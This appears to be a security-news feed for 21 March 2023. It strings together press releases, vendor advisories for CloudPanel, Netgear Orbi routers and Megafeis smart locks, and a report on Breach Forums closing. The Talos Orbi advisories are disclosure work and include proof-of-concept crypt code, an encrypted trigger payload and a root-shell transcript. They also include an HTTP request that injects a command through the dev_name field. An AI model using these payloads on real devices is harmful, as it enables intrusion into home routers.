IONIX illuminates exploitable risks across the real attack surface and its digital supply chain providing security teams with critical focus to accelerate risk reduction.

**NEW YORK****,** **March 21, 2023** **/PRNewswire/ --** Cyberpion, the leader in Attack Surface Management, has rebranded as IONIX (pronounced 'eye on x'). IONIX helps customers keep an 'eye on x,' providing visibility into their real attack surface including an organization's internet-facing assets and their mesh of connected dependencies.

A threat actor set on penetrating an organization doesn't care whether they're attacking internet-facing assets directly or exploiting a vulnerability from an exposed third-party digital service. Using Connective Intelligence, IONIX accurately maps an organization's real attack surface and its digital supply chain, discovering more organizational assets than any other provider, and delivers unmatched capabilities for proactively preventing attacks.

2022 was a transformational year for IONIX. The company delivered 250% ARR growth and secured $27 million in Series A funding, led by U.S. Venture Partners and existing investors Team8 Capital and Hyperwise Ventures. In January 2023, IONIX announced that Marc Gaffan had been named CEO. Co-founder Nethanel Gelernter moved from CEO to Chief Technology Officer where he is focusing on accelerating innovation and scaling the company's ASM platform. Additionally, the company announced the appointment of Doron Gill as Vice President of Engineering, and Ido Samson as Chief Revenue Officer. 

"IONIX was built on the premise that the increasingly interwoven nature of the digital supply chain demands a radically different approach to threat protection by identifying the sprawling network of dependencies on the same level as an organization's other assets," said Marc Gaffan, CEO, IONIX. "IONIX's ASM solution helps organizations take control of their real attack surface and its digital supply chain. By working closely with our customers, we have expanded our offering with wider coverage and deeper focus into their biggest attack surface risks. We believe that our new brand and product strategy will provide us with a strong platform to grow and lead in this market."

**IONIX ASM Platform**

IONIX Connective Intelligence technology leverages machine learning to discover and monitor every internet-facing asset and connection, delivering laser focus into the most critical risks to the business. IONIX goes further, enabling action by providing the tools to rapidly remediate exploitable threats and reduce attack surface risk.

IONIX focuses on real risks by surfacing exploitable issues with large blast radius that require immediate attention. With less noise and fewer alerts, security teams can remediate what matters most, faster. To deliver on these market needs, IONIX has significantly expanded its capabilities to include:

Multi-layered prioritization that goes beyond risk severity to validate exploitability and identify blast radius:

*   Determine the blast radius - Rank asset importance based on data sensitivity, business context, brand reputation and inter-connectivity
*   Evaluate exploitability - Identify exploitable misconfigurations, documented exploits and simulated attacks
*   Integrate threat intelligence - Correlate deep dark web findings regarding leaked credentials and compromised machines with customers' asset inventories

*   Smart remediation workflows that reduce noise with clear action items and automatically assign tasks to the right subsidiary or operational owner
*   Integration with customers' cloud environments by combining inside out visibility with an outside in attackers' view to uncover even more exposed assets and shadow IT
*   Risk scores that quantify attack surface risk across multiple categories enabling decision makers to understand their security posture, track progress over time and make strategic, risk-informed decisions.
*   Executive ASM reports, generated with one-click, that provide a comprehensive high-level overview of customers' attack surface with visibility into their assets, risks and action items. 

"The IONIX brand is new, but the team here has been helping organizations secure their extended attack surface since long before there was even a market category," said Rik Turner, senior principal analyst in Omdia's IT security and technology team. "What they are delivering now as IONIX is a combination of broad coverage of the extended attack surface, along with a focus on the threats that matter most to the organization. The addition of the Risk Scores and Executive Reports comes as the C-Suite and Boards of Directors are focused on cybersecurity like never before, due to the attention of lawmakers and regulators, not to mention the extra attention attack surfaces have gained thanks to the pandemic."

**About IONIX**

IONIX is the attack surface management solution that uses Connection Intelligence to shine a spotlight on exploitable risks across your real attack surface – and its digital supply chain. Only IONIX discovers and monitors every internet-facing asset and connection, delivers laser focus into the most important risks to your business, and provides the tools to rapidly remediate exploitable threats and reduce attack surface risk. Global leaders including Infosys, The Telegraph, Warner Music Group and E. ON depend on IONIX's machine learning-powered discovery engine, contextual risk assessment and prioritization, and end-to-end remediation workflows to go on the offensive in managing their complex and ever-changing attack surfaces. For more information visit www.ionix.io or connect with us on LinkedIn.

Cyberpion Rebrands As IONIX

Missing MAC layer security in Silicon Labs Wi-SUN Linux Border Router v1.5.2 and earlier allows malicious node to route malicious messages through network.

top.location='https://community.silabs.com/ex/errorduringprocessing.jsp'

CVE-2023-1262

**WATERLOO, ON****,** **March 21, 2023** **/PRNewswire/ --** BlackBerry Limited (NYSE: BB; TSX: BB) announced today that it has entered into an agreement to sell substantially all of its non-core patents and patent applications to Malikie Innovations Limited ("Malikie"), a newly-formed subsidiary of Key Patent Innovations Limited ("KPI"), a leading intellectual property monetization company, for a combination of cash at closing and potential future royalties in the aggregate amount of up to $900 million.

The transaction is not subject to any financing conditions. Funding has been secured from a leading US-based investment firm, with in excess of $30 billion of assets under management.

_"We're extremely pleased to have executed this agreement with KPI, whose industry-leading expertise and experience positions them well to realize the patent portfolio's potential and enhance returns for BlackBerry," said_ John Chen_, Executive Chairman & CEO, BlackBerry. "This transaction, once complete, will further strengthen our balance sheet while simplifying our business and enabling increased focus on our core IoT and Cybersecurity opportunities."_

_"We are very excited to have completed this transaction with a partner of BlackBerry's calibre, and we look forward to getting to work to maximize returns from this portfolio," said_ Angela Quinlan_, Managing Director, KPI._

Under the terms of the agreement, BlackBerry will receive $170 million in cash on closing and an additional $30 millionin cash by no later than the third anniversary of closing.  BlackBerry will also be entitled to receive annual cash royalties from the profits generated from the BlackBerry patents, on the following basis:

*   8% of the first $500 million of profits;
*   15% of the next $250 million of profits;
*   30% of the next $250 million of profits; and
*   50% of all subsequent profits.

Royalty payments to BlackBerry will initially be capped at $700 million, subject to an annual cap increase of an amount equal to 4% of the remaining portion of the $700 million that has not been paid to BlackBerry as of the date of the increase.  Malikie's costs will also be capped in the calculation of profits generated.

Approximately 32,000 patents and applications relating primarily to mobile devices, messaging and wireless networking will be sold in the transaction with Malikie.  The transaction excludes patents and applications that are necessary to support BlackBerry's current core business operations. It also excludes approximately 120 monetizable non-core patent families relating to mobile devices (representing approximately 2,000 patents and applications which are primarily standards essential), as well as all existing revenue generating agreements.  BlackBerry will receive a license back to the patents being sold and the transaction will not impact customers' use of any of BlackBerry's products, solutions or services.

Completion of the transaction is conditional upon, among other things, satisfaction of all regulatory conditions under the Hart–Scott–Rodino Antitrust Improvements Act in the United States and the Investment Canada Act. 

Termination of Agreement with Catapult:

On December 20, 2022, BlackBerry provided an update on its previously-announced patent portfolio sale transaction with Catapult IP Innovations, Inc., indicating that Catapult was working with a financing partner and that the parties were negotiating definitive closing documents.  BlackBerry also disclosed that it was then in advanced term sheet discussions with another party that was fully financed, and which had completed its due diligence on the portfolio. 

Catapult was unable to secure financing that would have enabled it to complete the previously-announced transaction on amended terms that were acceptable to BlackBerry, and therefore BlackBerry has terminated its agreement with Catapult and has instead entered into the patent sale agreement with Malikie. 

**About BlackBerry** 

BlackBerry (NYSE: BB; TSX: BB) provides intelligent security software and services to enterprises and governments around the world. The company secures more than 500M endpoints including over 215M vehicles. Based in Waterloo, Ontario, the company leverages AI and machine learning to deliver innovative solutions in the areas of cybersecurity, safety, and data privacy solutions, and is a leader in the areas of endpoint security, endpoint management, encryption, and embedded systems.  BlackBerry's vision is clear - to secure a connected future you can trust.

_BlackBerry. Intelligent Security. Everywhere._  

For more information, visit BlackBerry.com and follow @BlackBerry.

BlackBerry Announces New Patent Sale Transaction With Patent Monetization Company for Up to $900M

MGT-COMMERCE CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface, shared across every installation of CloudPanel. This behavior was observed in version 2.2.0. There has been no indication from the vendor this has been addressed in version 2.2.1.

_Last updated at Tue, 21 Mar 2023 19:08:25 GMT_

While using the popular self-hosted web administration solution, CloudPanel from MGT-COMMERCE, Rapid7 researcher Tod Beardsley discovered three security concerns. The first, an issue involving the trustworthiness of the installation script provided by the vendor, was an instance of CWE-494: Download of Code Without Integrity Check, and was quickly addressed by the vendor in under a day.

The second issue was with how the installer overwrites local firewall rules to be overly permissive during setup, and appears to be an instance of CWE-183: Permissive List of Allowed Inputs. The third issue is more long-term; CloudPanel installations all share the same SSL certificate private key. This appears to be an instance of CWE-321: Use of Hard-coded Cryptographic Key.

**Product Description**

MGT-COMMERCE's CloudPanel is a free solution designed to ease the burden of administering self-hosted Linux servers, and is featured prominently at cloud virtual hosting providers such as AWS, Azure, GCP, Digital Ocean, and many others. More about CloudPanel can be found at the vendor's website.

**Credit**

These issues were discovered and reported by Tod Beardsley, a security researcher at Rapid7, and is being disclosed in accordance with Rapid7's vulnerability disclosure policy.

**Exploitation**

While experimenting with some self-hosting solutions for personal use, Beardsley discovered three issues that appear to place new CloudPanel installations at risk of opportunistic attacks across the internet.

**Pipe Curl to Bash**

The first issue, an instance of CWE-494 involving the trustworthiness of the "curl to bash" installation procedure documented by the vendor was quickly addressed by publishing a cryptographically secure checksum of the installation script. The vendor's website now includes this check for a sha256 hash, as seen in the screenshot below.

This hash changes as new versions of the install script are released, of course, so it may be different by the time you read this advisory. A strategy of publishing a cryptographically secure hash and incorporating a check of that hash should alleviate any concern about the usual "pipe curl to bash" procedure for downloading and installing software over the internet. If you trust the vendor's website, and if the vendor's website is itself protected with an HTTPS certificate, then you should be confident that the installation script they provide is actually the installation script you expect to run. We urge other software providers to incorporate a similar hash check for distributing their installation scripts if they must distribute them via "pipe curl to bash" schemes.

**Firewall Rule Rewrite On Installation**

The instance of CWE-183 arises due to the fresh installation procedure recommended by the vendor in their documentation. During installation, the installation script preemptively discards local firewall rules for the host operating system, replacing them with much more permissive rules.

In the test case, the local firewall rules (as seen by ufw) are pre-set as:

    root@debian11:~# ufw status numbered
    Status: active
    
         To                         Action      From
         --                         ------      ----
    [ 1] Anywhere                   ALLOW IN    1.2.3.4               
    [ 2] 80:8443/tcp                DENY IN     Anywhere  
    

(Note, the allowed IP address has been replaced with "1.2.3.4")

The above rules state, "Allow any traffic from 1.2.3.4, deny all traffic to ports 80 through 8443 to everyone else." The ufw configuration also concludes with a general default deny rule (not seen here).

During installation, and upon completion of that one-command piping bash to curl installation procedure, these rules are changed to:

    root@debian11:~# ufw status verbose
    Status: active
    Logging: on (low)
    Default: deny (incoming), allow (outgoing), disabled (routed)
    New profiles: skip
    
    To                         Action      From
    --                         ------      ----
    22/tcp                     ALLOW IN    Anywhere                  
    80/tcp                     ALLOW IN    Anywhere                  
    443                        ALLOW IN    Anywhere                  
    8433:8443/tcp              ALLOW IN    Anywhere                  
    22/tcp (v6)                ALLOW IN    Anywhere (v6)             
    80/tcp (v6)                ALLOW IN    Anywhere (v6)             
    443 (v6)                   ALLOW IN    Anywhere (v6)             
    8433:8443/tcp (v6)         ALLOW IN    Anywhere (v6) 
    

These rules are, of course, far more permissive, specifically because they removed the deny rules as well as the custom IP address allow rule I had set prior to installation.

Furthermore, upon completion of the initial installation, the superuser administrator account for CloudPanel is blank. This is a problem because, typically, a user would navigate to the host server web panel and set the password to their chosen value. However, once installation is complete, and if the machine is on the routable internet (as is intended), an attacker could visit the same web panel and set the administration user account to their chosen password, thus effectively administrating the machine.

Note, the opportunity for attack is limited, since the legitimate CloudPanel administrator has the opportunity to reset firewall rules once installation is complete. However, when installation is complete, there is no notification that firewall rules have been discarded and replaced, so the legitimate user is left to discover this on their own.

If an attacker does manage to seize control during the vulnerable window of opportunity, they could install the malware of their choice, replace certificates, or otherwise alter the underlying operating system as an authenticated administrator, since the whole purpose of CloudPanel is to ease the task of OS management.

The trick for the attacker, then, is to find fresh installations of CloudPanel. This seems unlikely on the open internet assuming users are quick to set their superuser administrator account password, but issue CVE-2023-0391, described next, makes the job of finding these fresh CloudPanel servers much easier, in an automated way.

**CVE-2023-0391: Reused Certificates**

Upon installation, CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface. Because the SSL certificate is generated once by MGT-COMMERCE and shipped with every installation of CloudPanel, this state of affairs is exploitable for two outcomes.

First, because the SSL certificate has a unique but reused public key, searching for unmodified CloudPanel instances is trivial with modern network scanning techniques. All an attacker would need to do is target a given IP address space used by a targeted Virtual Private Server (VPS) provider, and continuously look for HTTPS services running on port 8443 (the default for this web administration portal) and certificates that match the public key fingerprint seen below:

Using these search parameters, an attacker can continuously search, in real time, for new instances of CloudPanel, and then exploit the CWE-183 issue described above. Of course, other techniques exist for identifying CloudPanel instances, but the reused certificate leads to a secondary, more serious problem.

Since the private key also ships with every installation of CloudPanel, and CloudPanel is freely available to anyone who cares to download it, the encryption provided by the HTTPS connection is not trustworthy. An attacker with the private key can easily decrypted captured traffic, either in real time through a privileged position on the network between the client and the server, or later with captured network traffic. In either case, sensitive information such as an administrator password and session tokens would be immediately available to the attacker.

According to Shodan, as of January 18, 2023, there are about 5,800 servers providing a certificate issued by 'cloudpanel.clp\`, the self-signed authority found on the shipping default certificate. These servers are found mostly in the United States and Germany (which is unsurprising given that the vendor is a German company), and mostly in DigitalOcean VPS environments. This figure is close to our own scanning with Project Sonar, which has spotted 6,785 running instances as of January 27, 2023.

**Impact**

By chaining together the firewall permissiveness and the reused certificate issues together, an attacker can target and exploit new CloudPanel instances as they are being deployed. It's important to note that CloudPanel is touted to be an easy to use interface for basic Linux administration, is targeted at relatively inexperienced users, and much of the documentation presumes an installation procedure live on the routable internet with a fresh VPS instance.

Furthermore, it would appear that CloudPanel is currently enjoying a burst of uptake among new Fediverse-aware users (this researcher included). While self-hosting is a perfectly innocent and often virtuous goal for distributing personal and professional content, it does come with some additional security responsibilities that are traditionally taken up by dedicated professional services.

Unfortunately, those dedicated professionals are absent in the DIY, roll-your-own kind of environment encouraged by Fediverse fans, and users are left to fend for themselves when it comes to secure software deployment. In light of this advisory, users interested in self-hosting solutions are urged to be aware of the special security considerations that come along with offering services on the general internet. In years past, this would go without saying, but the late 2022 turmoil around untrustworthy centralized services such as Twitter may be generating a new wave of inexperienced sysadmins on the internet, similar the the surge of general internet usage during the Eternal September of 1993.

**Remediation**

As of this publication, the firewall rewriting issue, the blank superuser password, and CVE-2023-0391 remain unfixed by the vendor. The issues described in the firewall rewrite issue could be fixed by the installation script taking a snapshot of the existing firewall rules, and programmatically creating a ruleset that incorporates the user's original intent with those rules. At the least, the script should identify, and warn the user, that firewall rules are about to be re-written.

The superuser administrator account should be created with a random, per-install password, and display that password on the console upon completion; once the user logs in for the first time, they could then be prompted to change the password.

Absent a patch for these issues, users should take care to install CloudPanel only on isolated networks in a way that is isolated beyond local firewall rules. Practically speaking, as long as the user is installing CloudPanel attentively, and watching for the moment the web service becomes available, attackers will only have a minute or so of exposure to take advantage of. Local, same-machine attackers aside, this should be good enough for most use cases.

For the second issue, the vendor could provide, as part of the installation script, a mechanism to create a unique self-signed SSL certificate during installation, and conclude the installation by printing the fingerprint on the console output.

Absent a patch for CVE-2023-0391, users of CloudPanel are encouraged to generate and install their own certificate for SSL use in order to avoid being so trivially fingerprintable by automated scans, and in order to ensure that the cryptographic security provided by HTTPS is actually secure against passive monitoring.

**Disclosure Timeline**

*   November, 2022: CWE-183 and CWE-494 issues discovered by Tod Beardsley of Rapid7
*   Wed, Nov 23, 2022: CWE-183 and CWE-494 reported to the vendor
*   Thu, Nov 24, 2022: Report acknowledged by the vendor, CWE-494 addressed
*   December, 2022: CVE-2023-0391 discovered
*   Wed, Jan 18, 2023: CVE-2023-0391 reported to the vendor
*   Tue, March 21, 2022: This public disclosure

CVE-2023-0391: CVE-2023-0391: MGT-COMMERCE CloudPanel Shared Certificate Vulnerability and Weak Installation Procedures

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

An issue discovered in MEGAFEIS, BOFEI DBD+ Application for IOS & Android v1.4.4 allows attacker to unlock model(s) without authorization via arbitrary API requests.

An authorization issue was discovered in the HTTP API used by the DBD+ mobile companion application, which is used to manage Megafeis branded smart locks. An authenticated user that is able to forge request signing keys can utilize this vulnerability to perform arbitrary API requests. This would grant them the ability to enumerate, transfer ownership of, and unlock any Megafeis smart lock within physical proximity using only the lock's MAC address, which it broadcasts over Bluetooth.

As of this advisory's publishing date, there has been no response from the manufacturer, nor is WithSecure aware of any remedial action taken.

Additional information on this issue, along with related issues discovered by the researcher, can be found in the following locations:

*   The Megafeis-palm: Exploiting Vulnerabilities to Open Bluetooth SmartLocks publication
*   The associated GitHub repository:  https://github.com/WithSecureLabs/megafeis-palm

Detailed information on this issue's exploitation and discovery can be found at the associated publication, Megafeis-palm: Exploiting Vulnerabilities to Open Bluetooth SmartLocks.

The authorization scheme's weakness can be attributed to two main factors. The first factor is Megafeis' solitary use of a signing key to validate requests sent from the DBD+ application to the backend API server. The second factor is that although session tokens are being sent with each web request to the API, the session tokens do not appear to be used for checking if a user is authorized to make that request.

The signing key was included in a custom HTTP header called "SecSignDest". Version 1.4.2 of the DBD+ application exposed its generation process as being a concatenation of various fixed and dynamic values. They are listed in order below:

*   The string "OKLOK"
*   The request's timestamp
*   Truncated data from the request's body
*   The API endpoint to which the request is being sent

After the above information is combined into a single string, a MD5 hash value is generated of that string. The resulting hash value is then used as the "SecSignDest" HTTP header value.

Recreating this formula to forge request signing keys allowed users to send arbitrary authorized requests to the API. Since the server did not perform proper authorization checks, this allowed arbitrary actions to be performed on other users' accounts (i.e. lock ownership reassignment).

To better demonstrate the above, WithSecure modified the source code of the DBD+ application to also add two additional HTTP headers with each web request.

*   The first header, "AbdullahMKey" is the previously mentioned concated string
*   The second header, "FinalDigest", is a MD5 hash of the "AbdullahMKey" header value

Below is a sample API request sent from the modified application, showing the additional headers mentioned. Note that the "FinalDigest" and "SecSignDest" header values are the same:

WithSecure also put the "AbdullahMKey" header value through a MD5 hash tool, which outputed the same hash value as "FinalDigest" and "AbdullahMKey", as shown in the image below. This demonstrates that the application generated the "SecSignDest" value using the method discovered by the researcher.

WithSecure created a proof of concept script that can be used to fully exploit this issue and take over any Megafeis-branded smart lock. The script requires the MAC address of the target smart lock as well as the attacker's DBD+ account username and password. The script was successfully tested on Megafeis smart lock models FB50S, GS60FB, GS40S, and GQ10FB

The script is available here: https://github.com/WithSecureLabs/megafeis-palm/blob/main/CVE-2022-45636/CVE-2022-45636\_PoC.py

CVE-2022-45636: Insecure Authorization Scheme for API Requests in DBD+ Mobile Companion Application for Megafeis Smart Locks

By Waqas
One of the Breach Forums administrators who goes by the alias Baphomet has decided to shut down the forum permanently.
This is a post from HackRead.com Read the original post: Breach Forums to Remain Offline Permanently

****The decision to shut down the Breach Forums came after the admin noticed someone had logged into an old forum CDN server on March 19th, 1:34 EST, 2023, indicating that federal authorities had access to Fitzpatrick’s devices.****

Hackread.com has learned that the infamous hacker and cybercrime forum Breach Forums has been permanently shut down. On March 18th, 2023, it was reported that Conor Brian Fitzpatrick (aka Pompompurin, aka Pom), the owner, founder, and administrator of Breach Forums, was arrested in New York.

The question regarding the forum’s future after Fitzpatrick’s arrest was echoed across different forums, with speculations about whether the forum would be seized by authorities, like its predecessor forum Raid Forums.

The day the news of Fitzpatrick’s arrest surfaced, one of its administrators, who goes by the alias Baphomet, claimed responsibility for taking over the forum to keep it running and protect it from being seized. They also claimed to have cut all of Fitzpatrick’s access to the forum.

However, in a statement made on the official Telegram channel of Breach Forums earlier today, Baphomet has announced the permanent shutdown of the forum. In a statement, Baphomet apologized to forum users for any inconvenience and emphasized that their decision was made for the betterment and safety of everyone.

It is worth noting that Baphomet plans to start a new Breach Forums-like community in the near future. However, for now, all forum domains will be redirected to a website owned by Baphomet.

**Reason for Sudden Shutdown**

The initial plan of administrator Baphomet was to keep Breach Forums online, but what changed their mind? In a statement, the administrator explained that the decision to shut down the forum came after they noticed someone had logged into an old forum CDN server on March 19th at 1:34 EST, 2023, which indicated that federal authorities had access to Fitzpatrick’s devices.

Baphomet stated that running a forum with the fear of law enforcement access would be risky, and the best solution for everyone’s safety was to permanently shut it down. Here’s what Baphomet had to say:

    This will be my final update on Breached, as I've decided to shut it down. I'm aware this news will not please anyone, but it's the only safe decision now that I've confirmed that the glowies likely have access to Pom's machine.
    
    As I said early on in all of this, anything related to production Breached infrastructure was locked down immediately - however I was kind enough to leave a few old, non-essential servers completely unchanged. One of those servers I left unchanged is an old CDN from months ago that no longer hosts any CDN files or configs but rather was used to just download large files from time to time.
    
    Throughout the migration I checked to see if anything was going on that would cause concern during the migration. One of the servers checked was the old CDN server described above. It seems someone logged in on Mar 19, 1:34 EST prior to me logging into the server. 
    
    Unfortunately this likely leads to the conclusion that someone has access to Poms machine. Any servers we use are never shared with anyone else, so someone would have to know the credentials to that server to be able to login. I now feel like I'm put into a position where nothing can be assumed safe, whether it is our configs, source code, or information about our users - the list is endless. This means that I can't confirm the forum is safe, which has been a major goal from the start of this shitshow.
    
    As for what this means now, It's complicated. Unlike when other communities go down and everyone scatters, stupidly I will still be around. I will redirect all the Breached domains to my baph.is domain. The Telegram group and channel will remain up for now, but I will make a new Telegram group for those interested in seeing what I have planned next. I will always be willing to sign a message to prove my identity to the community.
    
    While the community of Breached will die, I'm going to continue conversations with some of the competitor forum admins and various service operators who reached out to me over the past few days. I'm hoping to work with some of those people to build a new community, that will have the best features of Breached while reducing the attack surfaces we never properly addressed. As with things like this, I have no doubt our userbase may be absorbed by another community but if there is patience then I hope to bring something back that will rival any other community that can take our place.
    
    I'll be taking 24 hours from the sharing of this message to just rest and think. I'll be back online to talk with everyone, and we'll go from there. The domains for the time being shouldn't be seized, but I'll let the community know if any of that happens.
    
    For now - see you, space cowboy.
    
    Baphomet

**What’s Next?**

Although the shutdown of Breach Forums is seen as a positive initiative, for investigators, cybersecurity journalists, and researchers, it may become a rabbit hole. With no reliable community to turn to, cybercriminals could move to Russian-language forums to dump stolen databases, which is a bigger and larger-scale threat to unsuspecting users and organizations.

It is worth noting that Russian hacker forums are already forming alliances with Chinese-speaking hacker groups, which could eventually become a perfect recipe for disaster for adversaries on the opposite side.

1.  WT1SHOP Cybercrime Market Seized
2.  SSNDOB Cybercrime Marketplace Seized
3.  World’s largest private torrent site Filelist seized
4.  Hive ransomware disrupted; servers, site Seized
5.  NetWire malware site, server seized, admin arrested

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Breach Forums to Remain Offline Permanently

By Habiba Rashid
